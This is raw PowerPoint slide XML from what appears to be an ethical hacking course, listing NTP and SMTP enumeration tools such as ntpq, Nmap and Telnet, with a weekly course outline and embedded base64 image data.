              </a:rPr>
              <a:t>Ntpdate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Ntptrace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Ntpdc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Ntpq</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Enumeration tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PresenTense Time Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NTP Server Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>LAN Time Analyzer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24784379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pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>SMTP Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2048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400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Simple Mail Transfer Protocol (SMTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Used to transfer email messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Operates on port 25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Enumeration tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NetScan Tool Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Telnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17067548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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview of the course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41842" y="1447800"/>
            <a:ext cx="8649758" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 01 – Introduction, Ethical Hacking Basics, Ethics, Law</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 02 – Technical Foundations of Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 03 – Reconnaissance, Social Media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 04 – Scanning and Probing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 05 – Vulnerability Identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 06 – Exploiting Weaknesses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 07 – Class Presentations / Review for Exam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 08 – Spring Break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 09 – Midterm Exam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="1800" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Privilege Escalation, Maintaining Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 11 – Malware, Covering your Tracks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 12 – The Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 13 – Wireless and Mobile Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Week 14 – Physical Security, Social Engineering, and Security Policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1FEA05"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 15 – Class Presentations / Review for Exam </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 16 – Final Exam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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